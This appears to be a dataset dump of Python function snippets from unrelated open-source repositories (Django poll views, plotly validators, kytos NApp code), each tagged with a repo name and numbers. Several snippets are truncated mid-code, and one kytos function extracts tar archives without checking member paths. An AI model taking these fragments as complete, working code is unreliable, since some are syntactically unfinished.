yield choice, input
return _QuestionForm | ella/ella-polls | [
3,
2,
3,
2,
1328022570
] |
def clean(self):
# TODO - antispam
return self.cleaned_data | ella/ella-polls | [
3,
2,
3,
2,
1328022570
] |
def contest_finish(request, context, qforms, contestant_form):
contest = context['object']
email = contestant_form.cleaned_data['email']
if Contestant.objects.filter(email=email, contest=contest).count() > 0:
context.update({
'duplicate' : True,
'forms' : qforms,
'contestant_form' : contestant_form,
})
return render_to_response(
get_templates_from_publishable('form.html', context['object']),
context,
context_instance=RequestContext(request)
)
choices = '|'.join(
'%d:%s' % (
question.id,
question.allow_multiple and ','.join(str(c.id) for c in sorted(f.cleaned_data['choice'], key=lambda ch: ch.id)) or f.cleaned_data['choice'].id)
for question, f in sorted(qforms, key=lambda q: q[0].id)
)
c = Contestant(
contest=contest,
choices=choices,
**contestant_form.cleaned_data
)
if request.user.is_authenticated():
c.user = request.user
c.save()
return HttpResponseRedirect(contest.get_absolute_url() + slugify(ugettext('result')) + u'/') | ella/ella-polls | [
3,
2,
3,
2,
1328022570
] |
def contest_conditions(request, context):
return render_to_response(
get_templates_from_publishable('conditions.html', context['object']),
context,
context_instance=RequestContext(request)
) | ella/ella-polls | [
3,
2,
3,
2,
1328022570
] |
def __init__(self, quiz):
form_list = [ QuestionForm(q) for q in quiz.questions ]
super(QuizWizard, self).__init__(form_list)
self.quiz = quiz
self.extra_context = {'object' : quiz, 'question' : quiz.questions[0], 'category' : quiz.category, } | ella/ella-polls | [
3,
2,
3,
2,
1328022570
] |
def process_step(self, request, form, step):
if (step + 1) < len(self.form_list):
self.extra_context['question'] = self.quiz.questions[step + 1] | ella/ella-polls | [
3,
2,
3,
2,
1328022570
] |
def result_details(request, context):
quiz = context['object']
if not quiz.has_correct_answers:
raise Http404
results = request.GET.get(RESULT_FIELD, '').split('|')
if len(results) != len(quiz.questions):
raise Http404
questions = []
for question, q_res in zip(quiz.questions, results):
q_id, id_list = q_res.split(':')
choices = question.choices
if question.allow_multiple:
cl = set(id_list.split(','))
for ch in choices:
if str(ch.id) in cl:
ch.chosen = True
else:
for ch in choices:
if str(ch.id) == id_list:
ch.chosen = True
break
questions.append((question, choices))
context['questions'] = questions
return render_to_response(
get_templates_from_publishable('result_detail.html', context['object']),
context,
context_instance=RequestContext(request)
) | ella/ella-polls | [
3,
2,
3,
2,
1328022570
] |
def contest(request, context):
return contest_vote(request, context) | ella/ella-polls | [
3,
2,
3,
2,
1328022570
] |
def aditional_loss(self):
'''
add an aditional loss
returns:
the aditional loss or None
'''
return None | vrenkens/nabu | [
110,
44,
110,
8,
1481296938
] |
def __init__(
self, plotly_name="tickfont", parent_name="layout.ternary.aaxis", **kwargs | plotly/python-api | [
13052,
2308,
13052,
1319,
1385013188
] |
def setup_nodes(self):
return start_nodes(4, self.options.tmpdir) | BitcoinUnlimited/BitcoinUnlimited | [
451,
230,
451,
63,
1397077380
] |
def __init__(self, plotly_name="x", parent_name="isosurface.caps", **kwargs):
super(XValidator, self).__init__(
plotly_name=plotly_name,
parent_name=parent_name,
data_class_str=kwargs.pop("data_class_str", "X"),
data_docs=kwargs.pop(
"data_docs",
"""
fill
Sets the fill ratio of the `caps`. The default
fill value of the `caps` is 1 meaning that they
are entirely shaded. On the other hand Applying
a `fill` ratio less than one would allow the
creation of openings parallel to the edges.
show
Sets the fill ratio of the `slices`. The
default fill value of the x `slices` is 1
meaning that they are entirely shaded. On the
other hand Applying a `fill` ratio less than
one would allow the creation of openings
parallel to the edges. | plotly/python-api | [
13052,
2308,
13052,
1319,
1385013188
] |
def __init__(self, username=None, name=None, version=None,
repository=None, meta=False):
self.username = username
self.name = name
self.version = version if version else 'latest'
self.repository = repository
self.meta = meta
self.description = None
self.tags = []
self.enabled = False
self.napp_dependencies = [] | kytos/kytos | [
43,
46,
43,
125,
1465587463
] |
def __repr__(self):
return f"NApp({self.username}/{self.name})" | kytos/kytos | [
43,
46,
43,
125,
1465587463
] |
def __eq__(self, other):
"""Compare username/name strings."""
return isinstance(other, self.__class__) and self.id == other.id | kytos/kytos | [
43,
46,
43,
125,
1465587463
] |
def id(self): # pylint: disable=invalid-name
"""username/name string."""
return str(self) | kytos/kytos | [
43,
46,
43,
125,
1465587463
] |
def uri(self):
"""Return a unique identifier of this NApp."""
version = self.version if self.version else 'latest'
if not self._has_valid_repository():
return ""
# Use the next line after Diraol fix redirect using ":" for version
# return "{}/{}:{}".format(self.repository, self.id, version)
return "{}/{}-{}".format(self.repository, self.id, version) | kytos/kytos | [
43,
46,
43,
125,
1465587463
] |
def package_url(self):
"""Return a fully qualified URL for a NApp package."""
if not self.uri:
return ""
return "{}.napp".format(self.uri) | kytos/kytos | [
43,
46,
43,
125,
1465587463
] |
def create_from_uri(cls, uri):
"""Return a new NApp instance from an unique identifier."""
regex = r'^(((https?://|file://)(.+))/)?(.+?)/(.+?)/?(:(.+))?$'
match = re.match(regex, uri)
if not match:
return None
return cls(username=match.groups()[4],
name=match.groups()[5],
version=match.groups()[7],
repository=match.groups()[1]) | kytos/kytos | [
43,
46,
43,
125,
1465587463
] |
def create_from_json(cls, filename):
"""Return a new NApp instance from a metadata file."""
with open(filename, encoding='utf-8') as data_file:
data = json.loads(data_file.read())
return cls.create_from_dict(data) | kytos/kytos | [
43,
46,
43,
125,
1465587463
] |
def create_from_dict(cls, data):
"""Return a new NApp instance from metadata."""
napp = cls()
for attribute, value in data.items():
setattr(napp, attribute, value)
return napp | kytos/kytos | [
43,
46,
43,
125,
1465587463
] |
def match(self, pattern):
"""Whether a pattern is present on NApp id, description and tags."""
try:
pattern = '.*{}.*'.format(pattern)
pattern = re.compile(pattern, re.IGNORECASE)
strings = [self.id, self.description] + self.tags
return any(pattern.match(string) for string in strings)
except TypeError:
return False | kytos/kytos | [
43,
46,
43,
125,
1465587463
] |
def _extract(filename):
"""Extract NApp package to a temporary folder.
Return:
pathlib.Path: Temp dir with package contents.
"""
random_string = '{:0d}'.format(randint(0, 10**6))
tmp = '/tmp/kytos-napp-' + Path(filename).stem + '-' + random_string
os.mkdir(tmp)
with tarfile.open(filename, 'r:xz') as tar:
tar.extractall(tmp)
return Path(tmp) | kytos/kytos | [
43,
46,
43,
125,
1465587463
] |
def _update_repo_file(self, destination=None):
"""Create or update the file '.repo' inside NApp package."""
with open("{}/.repo".format(destination), 'w') as repo_file:
repo_file.write(self.repository + '\n') | kytos/kytos | [
43,
46,
43,
125,
1465587463
] |
def __init__(self, controller, **kwargs):
"""Contructor of KytosNapps.
Go through all of the instance methods and selects those that have
the events attribute, then creates a dict containing the event_name
and the list of methods that are responsible for handling such event.
At the end, the setup method is called as a complement of the init
process.
"""
Thread.__init__(self, daemon=False)
self.controller = controller
self.username = None # loaded from json
self.name = None # loaded from json
self.meta = False # loaded from json
self._load_json()
# Force a listener with a private method.
self._listeners = {
'kytos/core.shutdown': [self._shutdown_handler],
'kytos/core.shutdown.' + self.napp_id: [self._shutdown_handler]}
self.__event = Event()
#: int: Seconds to sleep before next call to :meth:`execute`. If
#: negative, run :meth:`execute` only once.
self.__interval = -1
self.setup()
#: Add non-private methods that listen to events.
handler_methods = [getattr(self, method_name) for method_name in
dir(self) if method_name[0] != '_' and
callable(getattr(self, method_name)) and
hasattr(getattr(self, method_name), 'events')]
# Building the listeners dictionary
for method in handler_methods:
for event_name in method.events:
if event_name not in self._listeners:
self._listeners[event_name] = []
self._listeners[event_name].append(method) | kytos/kytos | [
43,
46,
43,
125,
1465587463
] |
def napp_id(self):
"""username/name string."""
return "{}/{}".format(self.username, self.name) | kytos/kytos | [
43,
46,
43,
125,
1465587463
] |
def _load_json(self):
"""Update object attributes based on kytos.json."""
current_file = sys.modules[self.__class__.__module__].__file__
json_path = os.path.join(os.path.dirname(current_file), 'kytos.json')
with open(json_path, encoding='utf-8') as data_file:
data = json.loads(data_file.read())
for attribute, value in data.items():
setattr(self, attribute, value) | kytos/kytos | [
43,
46,
43,
125,
1465587463
] |
def run(self):
"""Call the execute method, looping as needed.
It should not be overriden.
"""
self.notify_loaded()
LOG.info("Running NApp: %s", self)
self.execute()
while self.__interval > 0 and not self.__event.is_set():
self.__event.wait(self.__interval)
self.execute() | kytos/kytos | [
43,
46,
43,
125,
1465587463
] |
def _shutdown_handler(self, event): # pylint: disable=unused-argument
"""Listen shutdown event from kytos.
This method listens the kytos/core.shutdown event and call the shutdown
method from napp subclass implementation.
Paramters
event (:class:`KytosEvent`): event to be listened.
"""
if not self.__event.is_set():
self.__event.set()
self.shutdown() | kytos/kytos | [
43,
46,
43,
125,
1465587463
] |
def setup(self):
"""Replace the 'init' method for the KytosApp subclass.
The setup method is automatically called on the NApp __init__().
Users aren't supposed to call this method directly.
""" | kytos/kytos | [
43,
46,
43,
125,
1465587463
] |
def execute(self):
"""Execute in a loop until 'kytos/core.shutdown' is received.
The execute method is called by KytosNApp class.
Users shouldn't call this method directly.
""" | kytos/kytos | [
43,
46,
43,
125,
1465587463
] |
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.